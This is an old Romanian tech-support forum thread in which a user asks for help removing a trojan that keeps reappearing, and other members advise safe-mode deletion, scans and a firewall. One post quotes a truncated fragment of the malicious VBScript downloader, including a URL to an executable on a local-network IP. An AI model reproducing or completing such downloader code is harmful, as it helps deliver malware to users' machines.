Jump to content

SUBIECTE NOI
« 1 / 5 »
RSS
Incalzire in pardoseala etapizata

Suprataxa card energie?!

Cum era nivelul de trai cam din a...

probleme cu ochelarii
 Impozite pe proprietati de anul v...

teava rezistenta panou apa calda

Acces in Curte din Drum National

Sub mobila de bucatarie si sub fr...
 Rezultat RMN

Numar circuite IPAT si prindere t...

Pareri brgimportchina.ro - teapa ...

Lucruri inaintea vremurilor lor
 Discuții despre TVR Sport HD.

Cost abonament clinica privata

Tremura toata, dar nu de la ro...

Renault Android
 

nu stiu ce e

- - - - -
  • Please log in to reply
14 replies to this topic

#1
danok007

danok007

    Member

  • Grup: Banned
  • Posts: 479
  • Înscris: 11.02.2007
de cateva zile, de cand mi-am formatat calc, ca  mi s-a mai intamplat si inainte am probleme cu individul asta : [ http://i166.photobucket.com/albums/u82/danok007/individul.jpg - Pentru incarcare in pagina (embed) Click aici ]
mereu il sterg si mereu apare.stie cineva ce face si cum sa scap de el ?

#2
queensoft

queensoft

    Trust no one

  • Grup: Banned
  • Posts: 16,079
  • Înscris: 26.11.2005
Pai... tu ce crezi ca este? Alien? Clatite? Castraveti?
http://www.google.co...amp;btnG=Search
Daca te tot infectezi cu antivirusu ala... mai bine schimba-l.

#3
danok007

danok007

    Member

  • Grup: Banned
  • Posts: 479
  • Înscris: 11.02.2007

View Postqueensoft, on Jul 3 2007, 18:10, said:

Pai... tu ce crezi ca este? Alien? Clatite? Castraveti?
http://www.google.co...amp;btnG=Search
Daca te tot infectezi cu antivirusu ala... mai bine schimba-l.

daca mi-ai si traduce ce scrie pe site-urile alea chiar ca mi-ai fi de ajutor

#4
AndreiASM

AndreiASM

    Active Member

  • Grup: Members
  • Posts: 1,021
  • Înscris: 24.06.2007
Troianul e un downloader, adica downloadeaza de pe net amici'troieni/virusi/viermi etc. In mod normal, la stergere ar trebui sa dispara complet, doar daca nu mai ai pe altundeva alti troieni. Fa un deep scan si posteaza ce a gasit.

Andrei

#5
queensoft

queensoft

    Trust no one

  • Grup: Banned
  • Posts: 16,079
  • Înscris: 26.11.2005

View Postdanok007, on Jul 3 2007, 19:49, said:

daca mi-ai si traduce ce scrie pe site-urile alea chiar ca mi-ai fi de ajutor

Daca ai fi spus ca nu stii engleza, ce bine era. Stii, puterile mele parapsihopatice sint abia la incpeut, inca nu am ajuns la citirea gindurilor.

#6
BlueMe

BlueMe

    The One & Only

  • Grup: Senior Members
  • Posts: 2,256
  • Înscris: 19.02.2005
Da click dreapta pe fisier, selecteaza Edit si posteaza continutul aici.

#7
danok007

danok007

    Member

  • Grup: Banned
  • Posts: 479
  • Înscris: 11.02.2007
<_<

View PostBlueMe, on Jul 4 2007, 09:58, said:

Da click dreapta pe fisier, selecteaza Edit si posteaza continutul aici.

am dat clic dreapta, am dat si edit si imi spune "acces denied"  ,deci nu pot da edit, nu il pot copia si apare doar cand vrea el :|

#8
AndreiASM

AndreiASM

    Active Member

  • Grup: Members
  • Posts: 1,021
  • Înscris: 24.06.2007
Incearca sa-i stergi din safe mode.

Andrei

#9
danok007

danok007

    Member

  • Grup: Banned
  • Posts: 479
  • Înscris: 11.02.2007
tocmai mi-am scanat calculatorul cu kaspersky si nu a gasit nimic :( ,dar tot imi apare mesjaul ala de mai sus

#10
pykko

pykko

    I love, therefore I am

  • Grup: Senior Members
  • Posts: 7,228
  • Înscris: 10.02.2006

View Postdanok007, on Jul 7 2007, 11:48, said:

<_<

am dat clic dreapta, am dat si edit si imi spune "acces denied"  ,deci nu pot da edit, nu il pot copia si apare doar cand vrea el :|
pai asta nu se poate probabil pentru ca este activat antivirusul. Si nu-ti da voie sa accesezi fisierul. :)

#11
danok007

danok007

    Member

  • Grup: Banned
  • Posts: 479
  • Înscris: 11.02.2007
am reusit sa dau edit pe fisier   :D
atat am gasit :
"dim HTTPGET
dim Data
dim ExeURL
dim LocalPath

ExeURL = "http://10.0.30.140:2...85_winsrp.exe""

de acu ce tre s fac ca s scap de el ? am scapat pc-ul, nu a gasit aproape nimic, am sters ce a gasit, dar tot nu pot sa scap de scriptul ala.

Edited by danok007, 08 July 2007 - 14:47.


#12
AndreiASM

AndreiASM

    Active Member

  • Grup: Members
  • Posts: 1,021
  • Înscris: 24.06.2007
Dupa cum ti-am zis, e un downloader. Linkul deschide un alt executabil, care Dumnezeu stie ce este. Ca sa scapi de restu, incearca sa BOOT-ezi in safe mode, poate reusesti sa-l stergi asa.

Andrei

#13
pykko

pykko

    I love, therefore I am

  • Grup: Senior Members
  • Posts: 7,228
  • Înscris: 10.02.2006

View PostAndreiASM, on Jul 8 2007, 16:36, said:

Dupa cum ti-am zis, e un downloader. Linkul deschide un alt executabil, care Dumnezeu stie ce este. Ca sa scapi de restu, incearca sa BOOT-ezi in safe mode, poate reusesti sa-l stergi asa.

Andrei
Am copiat textul respectiv intr-un fisier caruia i-am pus extensia .vbs si dupa o scanare pe jotti's online scan numai Kaspersky il detecteaza. (+ F-Secure care are tot motor KAV). Am incercat sa descarc acel fisier si nu se poate. Din cate vad este un IP local cel mai probabil. Esti in retea? Ai firewall instalat ?

#14
danok007

danok007

    Member

  • Grup: Banned
  • Posts: 479
  • Înscris: 11.02.2007
eu am reusit sa descarc fisierul acela si l-am salvat, dar cu extensia schimbata din .exe in .txt.nu am nici un firewall ( asa cred.eu mi-am instalat win Xp fara nici un Sp si nu am facut nici o modificare nicaieri ) .IP-ul meu e 10.0.30.145 ( nu e real ) si sunt intr-o retea de cartier.
nu stiu ce sa fac pt ca mereu sterg fisierul acela si de fiecare data apare  iar.Nu as vrea sa imi formatez calculatorul iar :(

#15
pykko

pykko

    I love, therefore I am

  • Grup: Senior Members
  • Posts: 7,228
  • Înscris: 10.02.2006

View Postdanok007, on Jul 9 2007, 00:21, said:

eu am reusit sa descarc fisierul acela si l-am salvat, dar cu extensia schimbata din .exe in .txt.nu am nici un firewall ( asa cred.eu mi-am instalat win Xp fara nici un Sp si nu am facut nici o modificare nicaieri ) .IP-ul meu e 10.0.30.145 ( nu e real ) si sunt intr-o retea de cartier.
nu stiu ce sa fac pt ca mereu sterg fisierul acela si de fiecare data apare  iar.Nu as vrea sa imi formatez calculatorul iar :(
Pai asta e. ;) Este un atac din reteaua ta. Instaleaza-ti ZoneAlarm Free sau Comodo 2.4 si vei scapa de virusul asta. :)

Anunturi

Chirurgia endoscopică a hipofizei Chirurgia endoscopică a hipofizei

"Standardul de aur" în chirurgia hipofizară îl reprezintă endoscopia transnazală transsfenoidală.

Echipa NeuroHope este antrenată în unul din cele mai mari centre de chirurgie a hipofizei din Europa, Spitalul Foch din Paris, centrul în care a fost introdus pentru prima dată endoscopul în chirurgia transnazală a hipofizei, de către neurochirurgul francez Guiot. Pe lângă tumorile cu origine hipofizară, prin tehnicile endoscopice transnazale pot fi abordate numeroase alte patologii neurochirurgicale.

www.neurohope.ro

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

Forumul Softpedia foloseste "cookies" pentru a imbunatati experienta utilizatorilor Accept
Pentru detalii si optiuni legate de cookies si datele personale, consultati Politica de utilizare cookies si Politica de confidentialitate